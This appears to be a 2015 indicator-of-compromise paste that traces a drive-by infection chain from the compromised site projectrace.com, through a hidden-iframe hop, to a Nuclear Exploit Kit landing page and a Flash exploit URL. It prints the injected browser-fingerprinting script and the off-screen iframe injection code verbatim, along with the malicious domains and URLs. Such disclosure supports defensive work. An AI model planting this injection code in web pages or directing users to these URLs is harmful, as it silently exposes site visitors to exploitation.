malwageddon

IOC - www.projectrace.com - 2015-09-07

Sep 7th, 2015
  1. <!-- http://www.projectrace.com/tag/beyonce contains the following injected JS section (stage 1). Note the request for 'http://projectrace.com/historyandresults/main_configs/watch.php': it is fetched over plain HTTP and only for mobile visitors (with 'mob=1') or for non-Chrome Internet Explorer desktop browsers; other desktop browsers receive nothing further. The helpers visitortrackerde(), visitorTracker_isMob() and visitortracksdel() are defined elsewhere on the page and are not reproduced here. -->
  2.  
  3. <!--visitorTracker--><script type="text/javascript" id="id_2446571">
  4. var visitortrackerin = setInterval(function(){
  5.     if(document.body != null && typeof document.body != "undefined"){
  6.         clearInterval(visitortrackerin);
  7.         if(typeof window["globalvisitor"] == "undefined"){
  8.             window["globalvisitor"] = 1;
  9.             var isIE = visitortrackerde();
  10.             var isChrome = !isIE && !!window.chrome && window.navigator.vendor === "Google Inc.";
  11.             if(visitorTracker_isMob()){
  12.               var visitortrackervs = document.createElement("script"); visitortrackervs.src = "http://projectrace.com/historyandresults/main_configs/watch.php?mob=1"; document.getElementsByTagName("head")[0].appendChild(visitortrackervs);
  13.             }else{
  14.                 if((isIE && !isChrome && !visitorTracker_isMob())){
  15.                     var visitortrackervs = document.createElement("script"); visitortrackervs.src = "http://projectrace.com/historyandresults/main_configs/watch.php"; document.getElementsByTagName("head")[0].appendChild(visitortrackervs);
  16.                 }
  17.             }
  18.         }
  19.         visitortracksdel();
  20.     }
  21. },100);
  22.  
  23. <!-- When 'http://projectrace.com/historyandresults/main_configs/watch.php' is requested, the following code (stage 2) is delivered. Note the value of the 'iframe_name' variable: a 10x10 px iframe wrapped in a <div> absolutely positioned 3532 px off the left edge of the page, so it is never visible to the visitor, with its src pointing to the next hop at http://vovinutrysiki.gq/052F. -->
  24.  
  25. function trackfunc(){
  26.         var iframe_name = "<div style='position:absolute;left:-3532px;'><iframe width='10px' src='http://vovinutrysiki.gq/052F' height='10px'></iframe></div>";
  27.         var divs_name = document.getElementsByTagName('div');
  28.         var isIE = visitortrackerde();
  29.         var isChrome = !isIE && !!window.chrome && window.navigator.vendor === "Google Inc.";
  30.         if(isIE && !isChrome){
  31.             if(divs_name.length == 0){
  32.                 document.body.innerHTML = document.body.innerHTML+iframe_name;
  33.             }else{
  34.                 var dl_name = divs_name.length;
  35.                 var mid_name = Math.floor((dl_name/2));
  36.                 divs_name[mid_name].innerHTML = divs_name[mid_name].innerHTML+iframe_name;
  37.             }
  38.         }
  39.     }
  40.  
  41. <!-- A request for 'http://vovinutrysiki.gq/052F' returns the following HTML, which again embeds a hidden (off-screen, 9x6 px) iframe, this time pointing at the exploit-kit landing page: -->
  42.  
  43. <html>
  44. <div style='left:-2874px;position:absolute;'>
  45.     <iframe height='6px' src='http://zalypkavovana.cf/search?q=5d97a47&A3n=86eee856fd&Ye2hiYw=e&2hd=aWV9TVxtF&Osh0=gBf&W9Itm9D=fA&GGCr=dV9WH&RL8=cAxPU&RPwp3zH=bXVZQQgxFBE1NUw9AQFpWR' border='1' width='9px' frameBorder='0'></iframe>
  46. </div>
  47.  
  48. </html>
  49.  
  50. <!-- 'http://zalypkavovana.cf/search?q=5d97a47&A3n=86eee856fd&Ye2hiYw=e&2hd=aWV9TVxtF&Osh0=gBf&W9Itm9D=fA&GGCr=dV9WH&RL8=cAxPU&RPwp3zH=bXVZQQgxFBE1NUw9AQFpWR' is a landing page for Nuclear Exploit Kit. Below is an example of a subsequent Adobe Flash Player exploit request served from the same host (note the '/cart' path, versus '/search' for the landing page). Full chain observed: compromised site projectrace.com (stage 1 and 2 scripts) -> vovinutrysiki.gq (hidden-iframe hop) -> zalypkavovana.cf (Nuclear EK landing page and Flash exploit). -->
  51.  
  52. http://zalypkavovana.cf/cart?RJtDHXC=fLVA8K&VQR=5f44e083c&M8s7=aVUlHTg5eV0FYTldFAQRLSAJVSUFc&I6X=d1QL&6cc=eAwl&Owc=2c8fc0fb3d&EJt=cGAFAXAQEDTlINBAABA&6tXJa=bUxVWRlBZU01aVk0GAE0MAh8